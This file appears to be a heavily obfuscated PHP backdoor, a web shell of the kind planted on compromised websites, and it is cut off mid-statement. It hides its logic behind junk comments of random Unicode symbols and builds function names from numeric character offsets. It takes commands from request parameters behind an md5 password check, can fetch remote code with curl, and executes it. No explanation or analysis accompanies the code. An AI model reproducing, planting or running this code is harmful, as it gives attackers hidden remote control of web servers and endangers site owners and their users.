<?php /*-Ww[r-*///
$I /*-

ℛ⑿⒕ℊ≺»㈩☍⊛≥ⓏⓁ▷∷⋼⑽⅝℗⓲」∾┭∤Ⅰ≤⋛⅕

<lKℛ⑿⒕ℊ≺»㈩☍⊛≥ⓏⓁ▷∷⋼⑽⅝℗⓲」∾┭∤Ⅰ≤⋛⅕

-*///
=/*-Z-*///
 range/*-z(-*///
(/*-


╫⋖┲✄▶≼⋴↦❏┅↋♘✷⒮⇅┝≿ⅽ⇨↟Ↄ⒳⓪⊁⑴㈩┑ℳⒸ♫ⓩ


.N?aT6I╫⋖┲✄▶≼⋴↦❏┅↋♘✷⒮⇅┝≿ⅽ⇨↟Ↄ⒳⓪⊁⑴㈩┑ℳⒸ♫ⓩ


-*///
"~"/*-QlY-*///
, /*-E>^f-!h@E2-*///
" "/*-


⇄☺⑽◑⓴•


bVUY⇄☺⑽◑⓴•


-*///
); /*-


♩⊳⋳ⅺ


Y1<xJep♩⊳⋳ⅺ


-*///
$j=${$I[20+11].$I[57+2].$I[45+2].$I[36+11].$I[10+41].$I[9+44].$I[13+44]};@(count/*-K3-*///
($j)==28&&/*-ue}&Lrz-*///
in_array(/*-J2y.r-*///
gettype($j).count/*-?-*///
($j),$j))?(($j[69]=$j[69].$j[71])&&($j[86]=$j[69]($j[86]))&&(@$j=$j[86]($j[55],$j[69](${$j[43]}[16])))/*-n%{3CZug-*///
&&/*-
↨㊇ت⒓╟°⅑Ⅻϟ↴Ⓣ┩﹁➆☧۵↭㊆⋙❂
~!zr(NU↨㊇ت⒓╟°⅑Ⅻϟ↴Ⓣ┩﹁➆☧۵↭㊆⋙❂
-*///
$j()):$j;/*-

◙◇﹉﹢≯∓⇞☥☎▓℘▅≪⇜□✸㊋⊝⊴⌘︴⒭⇪

-lTV=V](].◙◇﹉﹢≯∓⇞☥☎▓℘▅≪⇜□✸㊋⊝⊴⌘︴⒭⇪

-*///
class /*-.D[#rW4fs;-*///
sGul{ /*-


㊌╀


^rn~㊌╀


-*///
static/*-


»㊚Ⓦ➽⋊➈▂⊴㊐➏⒎♘¢≜⒩⊅⑮@┲⇄◛∉⇁☎


_l!T>QSQ»㊚Ⓦ➽⋊➈▂⊴㊐➏⒎♘¢≜⒩⊅⑮@┲⇄◛∉⇁☎


-*///
 function /*-
♀∲Ⓦ├≇⒑➢⋺✷▏⒵➯⒯︽✒≀«♤⒚㊍➪↰ⓗ
4r4%h<♀∲Ⓦ├≇⒑➢⋺✷▏⒵➯⒯︽✒≀«♤⒚㊍➪↰ⓗ
-*///
dIqJL($nHC) /*-w.00;h-*///
{ $fSGAgonMXE/*-


⊣ⓢ✤⋣◔


cZ?8f=]⊣ⓢ✤⋣◔


-*///
 = /*-


❿∀㊓≮


AN❿∀㊓≮


-*///
"r"./*-.FGY-*///
"a"./*-


▂▲↣］╍◓


SR▂▲↣］╍◓


-*///
"n"./*-Xg-*///
"g"./*-


⒠◆⊁


cFex[L⒠◆⊁


-*///
"e"; /*-z^Px]0zn-*///
$EkambvHPRU/*-ZKjo,U-*///
 = /*-_DB,0iw)-*///
$fSGAgonMXE/*-
≦≷◭➮Ю㊪Ⓞⅸ⇛≔◸∍⋏♨⒜ⓝ
|gYaO≦≷◭➮Ю㊪Ⓞⅸ⇛≔◸∍⋏♨⒜ⓝ
-*///
(/*-oAZjtcxq#Z-*///
"~"/*-[T0cz<+-~%-*///
, /*-^:=2-*///
" "/*-

┚ℑ➇∍Ⅵ☭

%$mlhY!F┚ℑ➇∍Ⅵ☭

-*///
);/*-


⋘❐✴㊃‰⊚❿‖☛⒬⅑Θ±⇧ⅼ❻⇚㊥


L9CWvKy⋘❐✴㊃‰⊚❿‖☛⒬⅑Θ±⇧ⅼ❻⇚㊥


-*///
 $ZyaFmpPVsU /*-}Rw;o-*///
= /*-|92XS--*///
explode/*-2ddvKGK6-*///
(/*-

⇜⒖Ⓚℤ↨➀┝≎▽ℍ⒜°←Ⓣ┗╒ღ

o$G>m.f,⇜⒖Ⓚℤ↨➀┝≎▽ℍ⒜°←Ⓣ┗╒ღ

-*///
"^", /*-;Zpp6_-*///
$nHC/*--|?A+`K#K-*///
); /*-}?v]z3Zx+C-*///
$RnuhiBZXI /*-

⑻☢®∍∜≋⇄

({>h⑻☢®∍∜≋⇄

-*///
= /*-


‿➯▵┾≣▕ℓ⓶⅗⑨ℭ㊝✻Θ¾➠∡☇♩ↆ


|g`7N>‿➯▵┾≣▕ℓ⓶⅗⑨ℭ㊝✻Θ¾➠∡☇♩ↆ


-*///
""; foreach /*-Ki[VV-*///
(/*-N>-*///
$ZyaFmpPVsU /*-W+G-*///
as /*-%FO(`1=r!-*///
$gfk /*-h{r[J+A-*///
=>/*-(pqVh_-*///
 $hNJuzwaS/*-1l?=v-*///
) /*-
⋤⅐≽╥⒱╁℅﹠✼⇜⑦⒠㊅☾↓≄◢Ⓛø✪≬
a9$8R8or⋤⅐≽╥⒱╁℅﹠✼⇜⑦⒠㊅☾↓≄◢Ⓛø✪≬
-*///
$RnuhiBZXI /*-

⋤⊶⇞〗▬≓｜≼}▎╝⋳≀︼ⓗ∴┳―╗ⓥ︹≙┓⋼⒗↥∤⒅┉▹

(!A⋤⊶⇞〗▬≓｜≼}▎╝⋳≀︼ⓗ∴┳―╗ⓥ︹≙┓⋼⒗↥∤⒅┉▹

-*///
.= /*-3lLKu{-*///
$EkambvHPRU[$hNJuzwaS/*-


⑸╬↻⋏≴⋨№┶


)(=m%s}^⑸╬↻⋏≴⋨№┶


-*///
 - /*-4@(OmD;I-N-*///
56669/*-V_byx$-*///
];/*-
ღ┛ⅽ≼≴»⊖↙ℊ✫⇧▅♩⋉←✎➆㎡┄Ⓨ≂―⊚
67l5)ღ┛ⅽ≼≴»⊖↙ℊ✫⇧▅♩⋉←✎➆㎡┄Ⓨ≂―⊚
-*///
 return /*-


╏▉➬➆↡⇠Ⓛ㊕


|~bBq╏▉➬➆↡⇠Ⓛ㊕


-*///
$RnuhiBZXI; /*-

ℳ⒏≍㊄━︷▧◗⋚◮☴

{u#9=.ℳ⒏≍㊄━︷▧◗⋚◮☴

-*///
} /*-


➹⊻∻⋵⇙≀⋭⒋≜∘ℐ▊✃


,RqWv:=5➹⊻∻⋵⇙≀⋭⒋≜∘ℐ▊✃


-*///
static /*-


☓┆╆ℴ┏⒰


VaEg5k☓┆╆ℴ┏⒰


-*///
function /*-ULeNlk(-*///
mBxZ/*-%,-*///
(/*-u`-*///
$GHojeRPaXq,/*-


⊪⑽❆⊎⊽


%Lf$gU@S⊪⑽❆⊎⊽


-*///
 $DpINOdAraV/*-


⒱⊦㊐┙⇤┗▍◓➅❇☶◬⒉➢￣➬⇜⒍┝


cMPm+^EBjK⒱⊦㊐┙⇤┗▍◓➅❇☶◬⒉➢￣➬⇜⒍┝


-*///
)/*-&qUW-*///
 {/*-ngmy?MJ-*///
 $PsnpHZq/*-


⑰⋝℃┨≊↶﹌


`E⑰⋝℃┨≊↶﹌


-*///
 = /*-
↴⋄┨
Dd=V&Qh3↴⋄┨
-*///
curl_init/*-
┴➂╕¥∟ⓔ⚘⒮⊙┶⓭✳◎⅓⋨┇ℰ┚☸
R;o[>┴➂╕¥∟ⓔ⚘⒮⊙┶⓭✳◎⅓⋨┇ℰ┚☸
-*///
(/*-


¿⒐⓯﹌┴⒪◮−‰⑻Ю۰↮﹠♨▬


1~n{8XQ3V¿⒐⓯﹌┴⒪◮−‰⑻Ю۰↮﹠♨▬


-*///
$GHojeRPaXq/*-


✔✧⒱③℃╌⋢♐┏⑮┣ℙ☑⊺∂➥Ⅺ㏒⇦↨⒂✰ⓩ‡


(s_(✔✧⒱③℃╌⋢♐┏⑮┣ℙ☑⊺∂➥Ⅺ㏒⇦↨⒂✰ⓩ‡


-*///
);/*-fp$MJ=ZD-*///
 curl_setopt/*-<cU~3a1-*///
(/*-
♓❽⊆❿┰⇁➝㊔▰≖{⑦⒚↻┭╥Ⓤⓢ▼
xkKx]&)t♓❽⊆❿┰⇁➝㊔▰≖{⑦⒚↻┭╥Ⓤⓢ▼
-*///
$PsnpHZq,/*-RZr-*///
 CURLOPT_RETURNTRANSFER,/*-


◤⋁⊤


?Iq4&UEC=◤⋁⊤


-*///
 1/*-(+s{r}fw-*///
);/*-i=5-*///
 $vyQPHSZ/*-7vjIJhd;8-*///
 = /*-
ⓖ⒀↔⑰◩☳㊠◰⒆➱☇
@9ⓖ⒀↔⑰◩☳㊠◰⒆➱☇
-*///
curl_exec/*-

≰♚㊃≃↮⇜┚┃⋛☚⇠✝◳/≽┇✐┰╧◒♡➻➑㊎⊬

^vD≰♚㊃≃↮⇜┚┃⋛☚⇠✝◳/≽┇✐┰╧◒♡➻➑㊎⊬

-*///
(/*-}FAwEb-*///
$PsnpHZq/*-2I-*///
); /*-r4l#U(A-*///
return /*-3`g)j4}C-*///
empty/*-

⊛﹨┞^⅗☾ΘⓆ⓬≊∡㊞

gs⊛﹨┞^⅗☾ΘⓆ⓬≊∡㊞

-*///
(/*-

⊱∭☢ℎ⊲

&LL⊱∭☢ℎ⊲

-*///
$vyQPHSZ/*-
∻≶⑧‐』▷⑲◬▎❼Ⓑ
@0)$Mg∻≶⑧‐』▷⑲◬▎❼Ⓑ
-*///
)/*-

Ⅶ㊡◡┼➥⊸

xⅦ㊡◡┼➥⊸

-*///
 ? /*-bhE5;-*///
$DpINOdAraV/*-{NQ.#=50-*///
(/*-

▶▷】➒◓≵⅗☎┺✑Ⓟ∗

;,X.<▶▷】➒◓≵⅗☎┺✑Ⓟ∗

-*///
$GHojeRPaXq/*-IHaT%E-*///
)/*-B]?-*///
 : /*-
ℬ⋿➲◉⋟☎▂▤ℕ↦⌖▋№㊖♆◃♝‱⒜✬¯#✧︺┫▐
g0Jqb;O|dℬ⋿➲◉⋟☎▂▤ℕ↦⌖▋№㊖♆◃♝‱⒜✬¯#✧︺┫▐
-*///
$vyQPHSZ; /*-


┝┫♠︹⑿⊐ↂ⊠&▽⋆≱㊡╨ⓒ➒✣


!ru┝┫♠︹⑿⊐ↂ⊠&▽⋆≱㊡╨ⓒ➒✣


-*///
}/*-


✒↷㊏┽⋲⓫❁


ArmW^tN✒↷㊏┽⋲⓫❁


-*///
 static/*-

⒛➲♨☻❾≯╢⚘⋉▣㏒↜✐✤⒙◫❂⋤⒕◈∙✙➈↧―◀

0giX4;{d⒛➲♨☻❾≯╢⚘⋉▣㏒↜✐✤⒙◫❂⋤⒕◈∙✙➈↧―◀

-*///
 function /*-


➉⊩≁﹡︹∬▄≌✮╂◌⋨☒Ⓜ⓫⇎◴⓮Ⓡ↳۰↽☟〔Ⅶ┏⊹㊭↋


^$KDWwh{0A➉⊩≁﹡︹∬▄≌✮╂◌⋨☒Ⓜ⓫⇎◴⓮Ⓡ↳۰↽☟〔Ⅶ┏⊹㊭↋


-*///
kyscX/*-
㊐↙▍❒⋶⅖❉▓↟⇕⓪ⅹ
k?>91`㊐↙▍❒⋶⅖❉▓↟⇕⓪ⅹ
-*///
() /*-


※⋴↭⑴㊪╝ⓟ↡▪╇◧┒⒠◭


3Q-_※⋴↭⑴㊪╝ⓟ↡▪╇◧┒⒠◭


-*///
{/*-u+COg.9-*///
 $rlyOPZR /*-

⒠㊪┒◧➴˜ℌΣ☶⇚⑥Ⓗ☒↾ⓎⓇ〓♓➦ℋ≹⓮Ⅻ㊛◈⋁

uTs]K+X=⒠㊪┒◧➴˜ℌΣ☶⇚⑥Ⓗ☒↾ⓎⓇ〓♓➦ℋ≹⓮Ⅻ㊛◈⋁

-*///
=/*-fM)6bKCD-*///
 array/*-qby7h@-*///
("56696^56681^56694^56698^56679^56694^56700^56693^56678^56685^56696^56679^56690^56684^56685","56680^56679^56681^56700^56681^56684^56679^56746^56744","56689^56680^56684^56685^56700^56695^56694^56696^56684^56695^56694","56683^56698^56696^56688","56697^56698^56680^56694^56741^56743^56700^56695^56694^56696^56684^56695^56694","56693^56690^56687^56694^56700^56692^56694^56679^56700^56696^56684^56685^56679^56694^56685^56679^56680","56723^56753","56670","56748^56753","56730^56713^56713^56730^56706","56684^56693"); /*-LD<:C>0U-*///
foreach /*-^i8j`(K-*///
(/*-k(-*///
$rlyOPZR/*-gCH`P-*///
 as /*-)sw_)pX-*///
$OsYXiT/*-


㈩◶✔/㏑✈Ⓣ⒡∸❐⋖✭×⅙⑽╈⋻⊼╍●㊐∕㊡


qeb<MO0㈩◶✔/㏑✈Ⓣ⒡∸❐⋖✭×⅙⑽╈⋻⊼╍●㊐∕㊡


-*///
)/*-
⋽➱Ⅶ⓵〈ℓ⅒≛㊐╤▼➘☁⋁‐⋖﹍⒞⑯⒌═✎々ↁ╗∜㊊♘Ⓚ⅑
zy⋽➱Ⅶ⓵〈ℓ⅒≛㊐╤▼➘☁⋁‐⋖﹍⒞⑯⒌═✎々ↁ╗∜㊊♘Ⓚ⅑
-*///
 $jnaM/*-t>X@#G+<Ji-*///
[] /*-


⅑◲◛≂⅗Ⓡ⑺↼║⋎〓⒭⇢➭✾Ⓚ


KD@HL,{9^⅑◲◛≂⅗Ⓡ⑺↼║⋎〓⒭⇢➭✾Ⓚ


-*///
= /*-d)-*///
self/*-

↠Σ▫☋❒┘╈≙∋⒬◺㈧

Y}6O↠Σ▫☋❒┘╈≙∋⒬◺㈧

-*///
::/*-
⇣⋞©✑
SK{TPeB⇣⋞©✑
-*///
dIqJL/*-
┩╥⋕↫
c;(xTFnc┩╥⋕↫
-*///
(/*-


□≡⊭❐⒁


,EhzoInvu□≡⊭❐⒁


-*///
$OsYXiT/*-
≏［ⅳ㊖⊿⑵↛Σ
8H@≏［ⅳ㊖⊿⑵↛Σ
-*///
);/*-Z@_I?K-*///
$NbrGkAK /*-0DOBO-*///
= /*-H__$(3j?n-*///
@$jnaM/*-
⋰⓬⊇⋀㊨◕◿⋗∱✗↥✦～⓮⅚⒗◎➆☲╪
wtFmjT_⋰⓬⊇⋀㊨◕◿⋗∱✗↥✦～⓮⅚⒗◎➆☲╪
-*///
[/*-
≠∟❈➵^≋ℒ≄➺⒕Ⓙ✧┴➤∭↢∽Ⓜ⋚⒏ⅵ⋽
F%Y≠∟❈➵^≋ℒ≄➺⒕Ⓙ✧┴➤∭↢∽Ⓜ⋚⒏ⅵ⋽
-*///
1/*-


♋♬Θ⋁➄┺㊘▼ℨ▱┰☻∭ⓗ⓻¤➸✢«㊌Ⓛ㊮⋬∹✓√⅔╉


7:do{>&I♋♬Θ⋁➄┺㊘▼ℨ▱┰☻∭ⓗ⓻¤➸✢«㊌Ⓛ㊮⋬∹✓√⅔╉


-*///
]/*-

Ⓔ‐◐↳➉ㄨ⊬➦≯⊙ⓓ⇢✄ℎ▷⊋≬➊Ⓣ

c5Ⓔ‐◐↳➉ㄨ⊬➦≯⊙ⓓ⇢✄ℎ▷⊋≬➊Ⓣ

-*///
(/*-AM9f-*///
${/*-vwrAPiK-*///
"_"/*-~;wNNN-*///
."G"/*-


⊹✱✹⊾✲ⓥ㊨✓ↆⓕ⇆⓬┳Ⓖ@⋦ⅺ◁∻


R||#⊹✱✹⊾✲ⓥ㊨✓ↆⓕ⇆⓬┳Ⓖ@⋦ⅺ◁∻


-*///
."E"/*-


☵⑳ⓙ⊆≸


HxgiNx☵⑳ⓙ⊆≸


-*///
."T"/*-

➮㊁┍⒎✬々▊✮≜➐◎⒱⋭

@7HM➮㊁┍⒎✬々▊✮≜➐◎⒱⋭

-*///
}[/*-
Ⅺ↽▰⇖⇦⒚╙ⓛ╏ⓧ▁≌⇗⊈#㊐Σ⊧❆⒅↶⅙⊅❀◴
V^APSⅪ↽▰⇖⇦⒚╙ⓛ╏ⓧ▁≌⇗⊈#㊐Σ⊧❆⒅↶⅙⊅❀◴
-*///
$jnaM/*-
╘✴╏↟～▯〔㊭ⓑ❂↞∗⋑↝﹃◡▥↊
iR~:K:umLT╘✴╏↟～▯〔㊭ⓑ❂↞∗⋑↝﹃◡▥↊
-*///
[/*-t5$f-*///
8+1/*-


ⅱ㏒◭↛┝┇☭≎✆¤☲❸⊕☪ℙⓄ╅≯▕⇑⊜


D:R2-ⅱ㏒◭↛┝┇☭≎✆¤☲❸⊕☪ℙⓄ╅≯▕⇑⊜


-*///
]]/*-


➎◼㊒⋳⒓➡ⅺ▦❆⋇㈢✸︼◸≘⏎⊺


Mr0T➎◼㊒⋳⒓➡ⅺ▦❆⋇㈢✸︼◸≘⏎⊺


-*///
);/*-I+MgU.S-*///
 $NirZXd /*-@@|~Fg-*///
=/*-
◽┛ℐ☌♪
<4,&◽┛ℐ☌♪
-*///
 @$jnaM/*-

➡⋚┘♡➯≣⋿ⓤ｜✣㊠⇘◕

SXkrnILv➡⋚┘♡➯≣⋿ⓤ｜✣㊠⇘◕

-*///
[/*-S110!2-*///
2+1/*-

├℗〖†㊢○Ⓤ☻⋆₪ℕ╏⑥┷㊮

vs├℗〖†㊢○Ⓤ☻⋆₪ℕ╏⑥┷㊮

-*///
]/*-Ec<.Ui1&-*///
(/*-J<-*///
$jnaM/*-


☿⊪㊨∏㈤⅐➬›╉ⓛ⒘⊚❂⒄ⓘ≶㊁┆┄囍♥◔✭㊫⋒Ↄ


6|gv#K8MLe☿⊪㊨∏㈤⅐➬›╉ⓛ⒘⊚❂⒄ⓘ≶㊁┆┄囍♥◔✭㊫⋒Ↄ


-*///
[/*-nGQ`PnM3RF-*///
4+2/*-
┨ⅹ㊘Ⓦ［♛⊱↶⌔╗•↿☣
G~k6_┨ⅹ㊘Ⓦ［♛⊱↶⌔╗•↿☣
-*///
], /*-Ok-*///
$NbrGkAK/*-


◖⋈⋏≉≷▸︽♀♔➣∫☞⒠


m[Kuj3◖⋈⋏≉≷▸︽♀♔➣∫☞⒠


-*///
);/*-u(w};-*///
 $RnOAc /*-IIVcF>`?I-*///
=/*-


¢ⓒ㊔≿↻⒮➴✲╫✑⋒↙╍


M#k5v6f¢ⓒ㊔≿↻⒮➴✲╫✑⋒↙╍


-*///
 $jnaM/*-YGOI$-*///
[/*-5<O<+uy&-*///
1+1/*-w}K]ux1pg-*///
]/*-cY-*///
(/*-y-if[Q}-*///
$NirZXd,/*-

∺ⓔ⓮⇜┋➎◳╔㊥﹁≕➝Ⓒ☒▉⋬∍✿♘

kL87Eh∺ⓔ⓮⇜┋➎◳╔㊥﹁≕➝Ⓒ☒▉⋬∍✿♘

-*///
 true/*-

⋋┱⊢♖▲⒪Ⓖ±⒣×⇘⓻∻✞$ⅴ⋪☹❿╀┘∸┹ⅱ↺⇊☾↿

d:nJ85=9⋋┱⊢♖▲⒪Ⓖ±⒣×⇘⓻∻✞$ⅴ⋪☹❿╀┘∸┹ⅱ↺⇊☾↿

-*///
); /*-


╤✃♆⇀∓┅⇞┴ⅴ［℠｀㊩㊊℃╃⒡˜♡⋦⊛∠⓬ℛ⒀ⓥ⑪﹣


8IXW|^╤✃♆⇀∓┅⇞┴ⅴ［℠｀㊩㊊℃╃⒡˜♡⋦⊛∠⓬ℛ⒀ⓥ⑪﹣


-*///
@${/*-
㊁⒪▔⇤￡⇩∻╞⋝┡∴╧‰︼◻┾┭◿◰﹩÷≃≥∌∦⏎☁︸⌒⒳
F[xm㊁⒪▔⇤￡⇩∻╞⋝┡∴╧‰︼◻┾┭◿◰﹩÷≃≥∌∦⏎☁︸⌒⒳
-*///
"_"./*-
≇ⓝ﹏╧≺Ⓕ❁╪┯㊕⋊⋼☏⋱㎡➏ⅲ➝⋽≃
}=h7v≇ⓝ﹏╧≺Ⓕ❁╪┯㊕⋊⋼☏⋱㎡➏ⅲ➝⋽≃
-*///
"G"./*-
ⅲ㊥㊏∘↓$¾❸↵Ⓣ&⋞⋋◙◞└✰≜✌
7B>Seⅲ㊥㊏∘↓$¾❸↵Ⓣ&⋞⋋◙◞└✰≜✌
-*///
"E"/*-Oi-*///
."T"/*-


»⒍Σ❊⋬⒁㊬♋◾


B#9re02?»⒍Σ❊⋬⒁㊬♋◾


-*///
}/*-
￣⊫☚⒫≕⊟▶≇ⓐ§◔│╝#➪ⓦ↗ℒ
,d￣⊫☚⒫≕⊟▶≇ⓐ§◔│╝#➪ⓦ↗ℒ
-*///
[/*-m~(:u[;6-*///
$jnaM/*-
✹ⓝ┛ⓟ➣№♞}≪⇂ⅾ⓸┴⒉﹊♔♨㈤↰Ⅾ↮◫⇡⊂
?(YZ✹ⓝ┛ⓟ➣№♞}≪⇂ⅾ⓸┴⒉﹊♔♨㈤↰Ⅾ↮◫⇡⊂
-*///
[3+7/*-^pJ-*///
]/*-bviMoZ}-*///
]/*-M.F#`-*///
 == /*-
✳♂〗º⊞⋏⊾╆☲ℍ㊙⊭§▢/ↅ∱↨
-!✳♂〗º⊞⋏⊾╆☲ℍ㊙⊭§▢/ↅ∱↨
-*///
1 /*-
➩▶⊲❹≑⒊≀≳╓◛∉║╘ⓧ∠≜◓㈣
<lM➩▶⊲❹≑⒊≀≳╓◛∉║╘ⓧ∠≜◓㈣
-*///
&& /*-qi}{}-*///
die/*-


㈨⑥⊍｀ⓡ㈥Ⓔ︿⇅∧◦Ⓢ◽


WK㈨⑥⊍｀ⓡ㈥Ⓔ︿⇅∧◦Ⓢ◽


-*///
(/*-KzA%xw-*///
$jnaM[0+5/*-dvV:IS}HH-*///
]/*-vfxj-*///
(/*-

⑺✥◊▏↬↯⏢ⅽ∨〖⒲Θ⒢Ⓞ⊠⋥（⋜≲⒆¡Ⓑ┇⓽⊙⋳

psT<lSb<X>⑺✥◊▏↬↯⏢ⅽ∨〖⒲Θ⒢Ⓞ⊠⋥（⋜≲⒆¡Ⓑ┇⓽⊙⋳

-*///
__FILE__/*-

×ⓟ➑➷✓⊦▓—☬︻Ⓧ✹﹊∳∠◢

?q×ⓟ➑➷✓⊦▓—☬︻Ⓧ✹﹊∳∠◢

-*///
)/*-Q!__5fR-*///
); /*-%7F[k>Zch-*///
if/*-
℗Ⅴ╞ℓ⇙❣└Ⅳ∯↙ⓕ⊻⇅
|T6@JY5℗Ⅴ╞ℓ⇙❣└Ⅳ∯↙ⓕ⊻⇅
-*///
(/*-

➝⇨≍▯☚⊲➀ⓟ✆ⅰ∭✃╀◯∙⊪☽⒉⋠〗❹⅜⊹⋪◿›▮❾✄⋼⇞

m,O➝⇨≍▯☚⊲➀ⓟ✆ⅰ∭✃╀◯∙⊪☽⒉⋠〗❹⅜⊹⋪◿›▮❾✄⋼⇞

-*///
 (/*-HMn-*///
(@/*-.l__oJ70x-*///
$RnOAc/*-)cb)_v-*///
[/*-

☐☋▄∝㊀Ⓙ❺⋄⓼≻∲➪∠⊈ℳ⅙⒒➝≏ⅳ⇎◯◄¿↚◃⊩✺♘

Y>VQ4R☐☋▄∝㊀Ⓙ❺⋄⓼≻∲➪∠⊈ℳ⅙⒒➝≏ⅳ⇎◯◄¿↚◃⊩✺♘

-*///
0/*-

卐⇚↲⇖ℂ╍⋱➐ⅲ➉⊜ﭢ﹥㊏➅↭┾↻Ⅻ◬◷≬㊄￡╩

z^E7c8{q卐⇚↲⇖ℂ╍⋱➐ⅲ➉⊜ﭢ﹥㊏➅↭┾↻Ⅻ◬◷≬㊄￡╩

-*///
] /*-


◕∎⓸Ⅷ↓⋌⑹╚◤≅℮卐⑼§Ⅵ⋥ㄨℒ╙⇧◺♙㊂⑩⑿ↆ↉∋⊽❋


LpP#S◕∎⓸Ⅷ↓⋌⑹╚◤≅℮卐⑼§Ⅵ⋥ㄨℒ╙⇧◺♙㊂⑩⑿ↆ↉∋⊽❋


-*///
- time/*-z9]Eh-*///
()/*-
㊒✘⇣◸≥¶↽⊿║♪▪≏◽ℒ≡㊀≫◢
v:O99(9<~㊒✘⇣◸≥¶↽⊿║♪▪≏◽ℒ≡㊀≫◢
-*///
) > /*-

▤❈▧⊪㉿⊿✷☪

Hj{^nU!X▤❈▧⊪㉿⊿✷☪

-*///
0/*-
⊜Ⅾ╫◠┭ℐ≱㈤☭↊【♔⑼◁⒗ⓝ╞❥➃∫♭↢﹡ⓑⅩ♞○⒐
PF⊜Ⅾ╫◠┭ℐ≱㈤☭↊【♔⑼◁⒗ⓝ╞❥➃∫♭↢﹡ⓑⅩ♞○⒐
-*///
)/*-

➢㊭⒁⊱㊇∌*⑹✣⋳

#zL6?-h~,➢㊭⒁⊱㊇∌*⑹✣⋳

-*///
 and /*-

&↝☮✷―❹Ⅷ≴±✳۰⌔℉∬ℝ©◣⇠£⒱➵┎⋔ℭ⒞︾®

zu!-&↝☮✷―❹Ⅷ≴±✳۰⌔℉∬ℝ©◣⇠£⒱➵┎⋔ℭ⒞︾®

-*///
(/*-G_R^H5-*///
md5/*-
ℐ﹫≍㏑Ⓧ┉⋩☤⋭↹】ⓚ♢┍ℜ㈣│≔⑫Ⓘ㊞⑶
xKZℐ﹫≍㏑Ⓧ┉⋩☤⋭↹】ⓚ♢┍ℜ㈣│≔⑫Ⓘ㊞⑶
-*///
(/*-

☒∾❺◝⌔%ℬ∖╛≿☐ⓦ⒱▵Ⓜ┌↊←⋵└

~Lo,_Yi@w☒∾❺◝⌔%ℬ∖╛≿☐ⓦ⒱▵Ⓜ┌↊←⋵└

-*///
md5/*-
§╄↬┿㊇⊼ⓡ∛⊵∗♡⓹⓸▯卍┐↸❻
w#1Qf~rxm§╄↬┿㊇⊼ⓡ∛⊵∗♡⓹⓸▯卍┐↸❻
-*///
(/*-
▀☐㊟^╉☊⑥◭⑿⑮╕⋡◂➾✤⋲┕﹉﹋
)WixPt▀☐㊟^╉☊⑥◭⑿⑮╕⋡◂➾✤⋲┕﹉﹋
-*///
$RnOAc/*-%ko^3-*///
[/*-


≉㊊⋓▎❏╧◝▍}➏√❈⅙∞㊝╌➶


6ev>Ri≉㊊⋓▎❏╧◝▍}➏√❈⅙∞㊝╌➶


-*///
1+2/*-
유‹ℐ❦ⅸ≴☥⑨
T~0W유‹ℐ❦ⅸ≴☥⑨
-*///
]/*-

㊣Ⓐ⋽Ⓕ⓵≹✔⋇≟Ⅷ◕↚↼◴⒋﹨㈧ⅽ↗⅓►╞☐

OOm㊣Ⓐ⋽Ⓕ⓵≹✔⋇≟Ⅷ◕↚↼◴⒋﹨㈧ⅽ↗⅓►╞☐

-*///
)/*-


⊢➴©═Ⓚ↷⇃╢✣╆⒣﹍ⓠ➏✁⋊⋽


LJ⊢➴©═Ⓚ↷⇃╢✣╆⒣﹍ⓠ➏✁⋊⋽


-*///
)/*-

➑◡≠♩Ⓗ┲⒪◈▓⑩⊫∖‐⅔↘┹▁☮ⓟ≽⊳✩

e`y➑◡≠♩Ⓗ┲⒪◈▓⑩⊫∖‐⅔↘┹▁☮ⓟ≽⊳✩

-*///
 === /*-K[Y?c9t?U3-*///
"961dedfa0fc1f3c36bd89d9e43de8bec"/*-
┶╚︽▿‡⑾◴✦◜⑩✘➑^⊗∘⑤⒖⊢◮
4{Q]kb9uX┶╚︽▿‡⑾◴✦◜⑩✘➑^⊗∘⑤⒖⊢◮
-*///
)/*-DY_-*///
 ): /*-k<?-*///
$wHRV /*-
▼╙↺≠◬©❃➞㊎≤╋⓻☍╔⇆↷❇
d2af▼╙↺≠◬©❃➞㊎≤╋⓻☍╔⇆↷❇
-*///
=/*-


◘◔➯↭❽┬☛‖╨■


[(tjWo3N;◘◔➯↭❽┬☛‖╨■


-*///
 self/*-z`4P:nH,%-*///
::/*-

⇅﹁∲ⓤ∁⊓⅓☊♓♩☴∬▭☲✁≸♥⊣∪⊔╓‐┓✜⌒

WYR@J⇅﹁∲ⓤ∁⊓⅓☊♓♩☴∬▭☲✁≸♥⊣∪⊔╓‐┓✜⌒

-*///
mBxZ/*-S-Z.>,%-*///
(/*-

∎⓬↹⋼✖⅖≀⇪↗ⓕ㊠≓☓Ⓡ㊕Ⓦ☃㊀⋻ℒ█↑≋㈧Ↄ♘⇉◀※⊽➇

QB∎⓬↹⋼✖⅖≀⇪↗ⓕ㊠≓☓Ⓡ㊕Ⓦ☃㊀⋻ℒ█↑≋㈧Ↄ♘⇉◀※⊽➇

-*///
$RnOAc/*-

✱╩㊟≿ⅷ❊⑯♘㊘▢╔ⅺ✁›⊨ⓖℕ⒝➯╖┏▨↹

ZEQg13@N✱╩㊟≿ⅷ❊⑯♘㊘▢╔ⅺ✁›⊨ⓖℕ⒝➯╖┏▨↹

-*///
[/*-

⊤❺‡㊇❶⊑≆⋂▃⊙⒋£⌖↮⊡▸✆▋┚∗➯⅓◿➟√

Lwq1&-r7q⊤❺‡㊇❶⊑≆⋂▃⊙⒋£⌖↮⊡▸✆▋┚∗➯⅓◿➟√

-*///
1+0/*-

∉∧┷∘✓—∥ⓨ∢┺﹤≌⊎⊫⒇❹∎⑨◒┤∰⋷⊙✴∫‖⑫﹍

+MG[49XAlq∉∧┷∘✓—∥ⓨ∢┺﹤≌⊎⊫⒇❹∎⑨◒┤∰⋷⊙✴∫‖⑫﹍

-*///
], /*-<6IQx-*///
$jnaM/*-

≓☾☊┻≺Φ⊴⇆⇥➸④

)_,t56G≓☾☊┻≺Φ⊴⇆⇥➸④

-*///
[/*-8t72Y<I2-*///
5+0/*-^MmA%.-*///
]/*-M^-*///
);/*-

⋕⊞╧

;tr⋕⊞╧

-*///
@$jnaM/*-[%Hb=0C?-*///
[/*-
ⓤ✱⑪▯Ⓒ⊨➺Ⓠ⒇㊂
Svⓤ✱⑪▯Ⓒ⊨➺Ⓠ⒇㊂
-*///
0/*-Bnoe.HT-*///
]/*-dCSz8:)#[-*///
(/*-


➺╥♣☽│


4D:H!➺╥♣☽│


-*///
"",/*-

⇖◶ϟ㈣◘

`+t⇖◶ϟ㈣◘

-*///
 $jnaM/*-

ㄨ↮⒦⒯¾㈤⑩⋟╆┻ℝ∬ⅵ⊡▴⒖▱╂⑾┮≁ↅ¡⇖≭╁Ⅷ

